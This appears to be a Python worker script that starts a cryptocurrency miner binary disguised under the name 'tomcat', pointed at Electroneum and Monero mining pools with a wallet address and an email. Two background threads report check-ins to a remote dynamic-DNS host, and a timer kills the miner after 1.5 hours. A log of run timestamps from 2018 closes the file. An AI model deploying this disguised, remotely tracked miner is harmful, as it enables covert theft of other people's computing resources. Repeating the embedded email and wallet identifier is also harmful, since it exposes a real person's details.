import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:03.726029
#2018-02-17 16:31:07.560558
#2018-02-17 18:19:03.864315
#2018-02-17 20:06:08.216721
#2018-02-17 21:53:03.326105
#2018-02-17 23:38:01.838267
#2018-02-18 01:27:02.199493
#2018-02-18 03:14:06.257810
#2018-02-18 05:03:08.161252
#2018-02-18 06:54:01.442130
#2018-02-18 08:42:06.293243
#2018-02-18 10:28:06.458918
#2018-02-18 12:14:01.719436
#2018-02-18 14:01:01.704950
#2018-02-18 15:51:06.662113
#2018-02-18 17:41:05.782365
#2018-02-18 19:28:06.910889
#2018-02-18 21:13:06.105578
#2018-02-18 23:01:07.021276
#2018-02-19 00:48:04.433904
#2018-02-19 02:35:02.246188
#2018-02-19 04:21:07.252280
#2018-02-19 06:06:03.721574
#2018-02-19 07:54:03.604744
#2018-02-19 09:44:04.778071
#2018-02-19 11:34:05.012542
#2018-02-19 13:21:04.506343
#2018-02-19 15:08:07.319902
#2018-02-19 16:57:01.728154
#2018-02-19 18:45:11.193640
#2018-02-19 20:35:09.270836
#2018-02-19 22:23:05.533117
#2018-02-20 00:09:01.658738
#2018-02-20 01:57:06.209742
#2018-02-20 03:46:07.520626
#2018-02-20 05:32:01.429189
#2018-02-20 07:16:01.686470
#2018-02-20 09:02:05.715838
#2018-02-20 10:45:06.562220
#2018-02-20 12:33:04.682324
#2018-02-20 14:18:06.247554
#2018-02-20 16:03:06.081729
#2018-02-20 17:49:08.436788
#2018-02-20 19:36:01.958403
#2018-02-20 21:22:04.575015
#2018-02-20 23:06:02.210319
#2018-02-21 00:51:08.909521
#2018-02-21 02:36:07.836897
#2018-02-21 04:24:06.844369
#2018-02-21 06:12:05.011202
#2018-02-21 07:57:05.874706
#2018-02-21 09:43:06.038736
#2018-02-21 11:32:08.814680
#2018-02-21 13:22:07.456339
#2018-02-21 15:08:01.261067
#2018-02-21 16:57:07.759059
#2018-02-21 18:47:06.712895
#2018-02-21 20:37:02.259327
#2018-02-21 22:22:05.869589
#2018-02-22 00:11:05.045023
#2018-02-22 01:58:06.502290
#2018-02-22 03:45:08.744630
#2018-02-22 05:33:01.595534
#2018-02-22 07:18:01.434772
#2018-02-22 09:05:07.395697
#2018-02-22 10:52:07.188272
#2018-02-22 12:38:01.612841
#2018-02-22 14:24:09.015069
#2018-02-22 16:11:01.840807
#2018-02-22 17:56:08.050733
#2018-02-22 19:44:01.266561
#2018-02-22 21:35:04.693172
#2018-02-22 23:22:07.872354
#2018-02-23 01:09:07.333725
#2018-02-23 02:56:04.153917
#2018-02-23 04:40:09.161166
#2018-02-23 06:27:03.723926
#2018-02-23 08:15:09.332907
#2018-02-23 10:33:04.447824
#2018-02-23 12:26:01.655921
#2018-02-23 14:14:02.011660
#2018-02-23 16:03:08.003991
#2018-02-23 17:47:10.035117
#2018-02-23 19:33:04.487803
#2018-02-23 21:16:06.215361
#2018-02-23 23:05:08.407003
#2018-02-24 00:53:04.361202
#2018-02-24 02:49:01.587753
#2018-02-24 05:28:04.711891
#2018-02-24 07:15:07.034224
#2018-02-24 09:06:06.275051
#2018-02-24 10:45:09.431609
#2018-02-24 12:29:04.351709
#2018-02-24 14:03:04.227750
#2018-02-24 15:38:01.461116
#2018-02-24 17:22:04.040721
#2018-02-24 18:54:03.805015
#2018-02-24 20:26:06.081874
#2018-02-24 21:59:01.748970
#2018-02-25 00:43:07.166784
#2018-02-25 04:42:04.073686
#2018-02-25 08:43:01.281710